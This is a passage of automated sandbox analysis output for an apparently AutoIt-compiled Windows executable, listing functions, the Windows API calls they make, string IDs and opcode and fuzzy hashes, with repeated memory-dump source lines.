                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: \0^
                                                • API String ID: 3712363035-3379709126
                                                • Opcode ID: 32db07969f3fce4702b68c3c4357e8697df40c1f1b821e513b0bd5300fc3f239
                                                • Instruction ID: 199575348d26d12ddfc890ce9e6295e2c54b067e2b0307b05e0c5fef0570b743
                                                • Opcode Fuzzy Hash: 32db07969f3fce4702b68c3c4357e8697df40c1f1b821e513b0bd5300fc3f239
                                                • Instruction Fuzzy Hash: AAF089B1640340BEE7246761AC4DFB73E9CEB15750F000461FB48DB1A1D6758E14A3F4
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: 3, 3, 16, 1
                                                • API String ID: 176396367-3042988571
                                                • Opcode ID: b97c82e97b9f76108d7faa4ffa72d9c8ab74e129d18355eba94377ff6c9fba8e
                                                • Instruction ID: 0dbe8ab5f30028e2020a1f2af57ed84f5bd2056c98449352165aaefa24bcd8b5
                                                • Opcode Fuzzy Hash: b97c82e97b9f76108d7faa4ffa72d9c8ab74e129d18355eba94377ff6c9fba8e
                                                • Instruction Fuzzy Hash: 5FE02B03225321109B3112799CC5B7F5F8DFFCD760B14182BF989C2267EAA49D9193A0
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00570B23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Message
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 2030045667-4017498283
                                                • Opcode ID: 98abebc8b2982cb242bf095458a39acc3f204d975030be5e7b8d515a1a203ba3
                                                • Instruction ID: 7e4c69ad8a3154ecb3eab911f476bee69323bb0faac76fd07e8a519cd20152dc
                                                • Opcode Fuzzy Hash: 98abebc8b2982cb242bf095458a39acc3f204d975030be5e7b8d515a1a203ba3
                                                • Instruction Fuzzy Hash: 8AE0D8322443192AD31437547C07F8D7FC8FF06B20F10042BF758555C38EE1689056A9
                                                APIs
                                                  • Part of subcall function 0052F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00530D71,?,?,?,0051100A), ref: 0052F7CE
                                                • IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 00530D75
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 00530D84
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00530D7F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 55579361-631824599
                                                • Opcode ID: aea7f27dbaea130a961ef3b5b8875058a0ec245fa07bdaa42d00e76bec545277
                                                • Instruction ID: 928c34918856d7bb29dd197693750a8d2d268d4c437d567f50edcac5761334f2
                                                • Opcode Fuzzy Hash: aea7f27dbaea130a961ef3b5b8875058a0ec245fa07bdaa42d00e76bec545277
                                                • Instruction Fuzzy Hash: A8E06D742007518BD7609FB8E41834A7FE4BF15744F004D2DE4C2C6691DBB0E4889B91
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0052E3D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: 0%^$8%^
                                                • API String ID: 1385522511-2219163478
                                                • Opcode ID: 9d555d80d306128dcd2a2438f01b95a601c879dab61278852ec3b23f3fed72d9
                                                • Instruction ID: 109e54cbb7a2779ec71da4751c73cd58f25d60cdef7062a304f4a2b57a14564b
                                                • Opcode Fuzzy Hash: 9d555d80d306128dcd2a2438f01b95a601c879dab61278852ec3b23f3fed72d9
                                                • Instruction Fuzzy Hash: E9E02631400BB4CBC60CD718FAAAA8C3B99BF66321F1019AAE0828F1DDDBB038419654
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: %.3d$X64
                                                • API String ID: 481472006-1077770165
                                                • Opcode ID: b8409e17d4200147f0b9e367c3f296fab4efbdfc5dee24edf01ed9c74ccb4cf2
                                                • Instruction ID: 729f93c779faf7c5fefaa4e5baeb76e7960134e890187afc99c36b062005929c
                                                • Opcode Fuzzy Hash: b8409e17d4200147f0b9e367c3f296fab4efbdfc5dee24edf01ed9c74ccb4cf2
                                                • Instruction Fuzzy Hash: 08D012B9D08119EACB9096D0DC599B9BF7CBF19301F508C63F80693040E728C5086771
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005A236C
                                                • PostMessageW.USER32(00000000), ref: 005A2373
                                                  • Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 7b2092d33540409cbf0eaf3ec833ed144daefd482c603b64476492f20de3fcf9
                                                • Instruction ID: ec4612f7faff35dbf9ca8e59b975b5bf59650b54b771ba011fdf326b28704b8e
                                                • Opcode Fuzzy Hash: 7b2092d33540409cbf0eaf3ec833ed144daefd482c603b64476492f20de3fcf9
                                                • Instruction Fuzzy Hash: 6DD0C9327813147AE674A774AC0FFC67E14AB6AB10F0049167755AA1D0C9A0A8059A54
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005A232C
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005A233F
                                                  • Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 0c05fbe7688509eec5cb5da9749bcd971773cbf62077507603128322a26c8ae8
                                                • Instruction ID: 8de9d5149be15e572fdd04aa17f7a7b24b8beb12ead648874b83316531c9eaa7
                                                • Opcode Fuzzy Hash: 0c05fbe7688509eec5cb5da9749bcd971773cbf62077507603128322a26c8ae8
                                                • Instruction Fuzzy Hash: E8D0C936794314BAE674A774AC0FFC67E14AB66B10F0049167759AA1D0C9A0A8059A54